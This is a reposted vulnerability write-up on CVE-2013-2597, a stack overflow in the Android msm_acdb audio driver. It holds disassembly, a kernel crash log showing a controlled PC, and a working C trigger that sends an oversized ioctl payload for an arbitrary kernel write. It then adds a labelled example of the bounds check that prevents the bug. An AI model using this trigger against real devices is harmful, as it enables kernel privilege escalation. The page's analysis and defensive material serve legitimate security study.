Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)
Date: 2022-03-10 17:49
do_vfs_ioctl:
STMPW [SP], { R4-R9, LR }
...
BL acdb_ioctl
...
ADD SP, SP, #$44 // (2)
LDMUW [SP], { R4-R9, PC } // (1)
2. A fragment of acdb_ioctl in which control of PC can be obtained. The register-modifying location is (3); at this point every value from R4 through PC can be manipulated.
ADD SP, SP, #$24 // (6)
LDMUW [SP], { R4-R9, PC }
5. The actual stack position and the position of p->data must be hard-coded to match the target.
ACDB=> ACDB ioctl not found!
Unable to handle kernel paging request at virtual address 9f9e9d9c
pgd = df56c000
[9f9e9d9c] *pgd=00000000
Internal error: Oops: 80000005 [#1] preEMPT SMP
Modules linked in:
CPU: 1    Tainted: G        W   (3.0.8+1.0.21100-02148-g79e6d0e #1)
PC is at 0x9f9e9d9c
LR is at acdb_ioctl+0x740/0x860
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <cutils/log.h>   /* ALOGI */
/* struct acdb_ioctl (a size field followed by a data[] payload) and acdb_param come
   from the driver header and the author's own definitions, which this page does not reproduce. */

static int write_value(const acdb_param *param, unsigned long address, unsigned long value)
{
    const char *device_name = "/dev/msm_acdb";
    struct acdb_ioctl arg;
    int fd;
    int ret;
    int i;

    fd = open(device_name, O_RDONLY);
    if (fd < 0) {
        ALOGI("failed to open %s due to %s.\n", device_name, strerror(errno));
        return -1;
    }

    /* Fill the payload with its own offsets so that every word is recognisable. */
    arg.size = param->pc2.pos + 4;
    for (i = 0; i < arg.size; i += 4) {
        *(unsigned long int *)&arg.data[i] = i;
    }
    *(unsigned long int *)&arg.data[param->address_pos] = address;      // R9
    *(unsigned long int *)&arg.data[param->value_pos] = value;          // R5
    *(unsigned long int *)&arg.data[param->pc1.pos] = param->pc1.value; //
    *(unsigned long int *)&arg.data[param->pc2.pos] = param->pc2.value; //

    ret = ioctl(fd, 9999, &arg); // any ioctl will do: the stack overflow turns it into an arbitrary-address write
    close(fd);
    return 0;
}
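The trigger above works because the handler takes arg.size from the caller and uses it as the length of a copy into a fixed-size buffer on its own stack frame. The following is an added example, not code from this page or from the msm_acdb driver: it models that defect class in user space and shows the check a hardened handler performs before the copy. The names user_arg, ACDB_LOCAL_WORDS, acdb_validate_size and acdb_copy_checked, and the buffer sizes, are assumptions made for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the handler's local (stack) buffer, in 32-bit words. */
#define ACDB_LOCAL_WORDS 16
#define ACDB_LOCAL_BYTES (ACDB_LOCAL_WORDS * 4)

/* Hypothetical ioctl argument: a caller-chosen byte count followed by a payload. */
struct user_arg {
    uint32_t size;
    uint32_t data[256];
};

/* The local buffer must never be larger than the source payload, or a
   "valid" size could read past the end of data[]. */
_Static_assert(ACDB_LOCAL_BYTES <= sizeof(((struct user_arg *)0)->data),
               "local buffer larger than the payload it is copied from");

/* Validate the caller-supplied length before it is used as a copy bound.
   Returns 0 when a copy of that many bytes into the local buffer is safe,
   -EINVAL otherwise. */
int acdb_validate_size(uint32_t size)
{
    if (size == 0 || size % 4 != 0)   /* empty or misaligned payload */
        return -EINVAL;
    if (size > ACDB_LOCAL_BYTES)      /* would overflow the local buffer */
        return -EINVAL;
    return 0;
}

/* Hardened copy: the length is validated first and the copy uses the
   validated value, so the local buffer cannot be overrun.  Copies the result
   to out (out_words capacity) and returns the number of words copied, or a
   negative errno value. */
int acdb_copy_checked(const struct user_arg *arg, uint32_t *out, size_t out_words)
{
    uint32_t local[ACDB_LOCAL_WORDS];   /* the stack buffer an unchecked copy would overrun */
    int rc = acdb_validate_size(arg->size);
    if (rc < 0)
        return rc;

    memcpy(local, arg->data, arg->size); /* bounded by the check above */

    size_t words = arg->size / 4;
    if (out_words < words)
        return -EINVAL;
    memcpy(out, local, arg->size);
    return (int)words;
}

/* Constructed sample: a well-formed 16-byte payload.  Returns the number of
   words copied, or -1 if the copied content is not what was sent. */
int demo_good(void)
{
    struct user_arg arg = { .size = 16, .data = { 1, 2, 3, 4 } };
    uint32_t out[ACDB_LOCAL_WORDS] = { 0 };
    int rc = acdb_copy_checked(&arg, out, ACDB_LOCAL_WORDS);
    if (rc == 4 && out[0] == 1 && out[3] == 4)
        return rc;
    return -1;
}

/* Constructed sample: a payload one word larger than the local buffer, the
   shape of the overflow trigger.  Returns the handler's (negative) result. */
int demo_oversize(void)
{
    struct user_arg arg = { .size = ACDB_LOCAL_BYTES + 4 };
    uint32_t out[ACDB_LOCAL_WORDS] = { 0 };
    return acdb_copy_checked(&arg, out, ACDB_LOCAL_WORDS);
}

int main(void)
{
    printf("well-formed payload: %d words copied\n", demo_good());
    printf("oversized payload:   rc=%d (expected -EINVAL=%d)\n", demo_oversize(), -EINVAL);
    return 0;
}
```

The point of the example is ordering: the length is checked against the size of the destination before any copy happens, and the copy then uses that same checked value. Checking a different quantity, or checking after the copy, leaves the overflow in place.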
Reference article:
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597), 布布扣 (bubuko.com)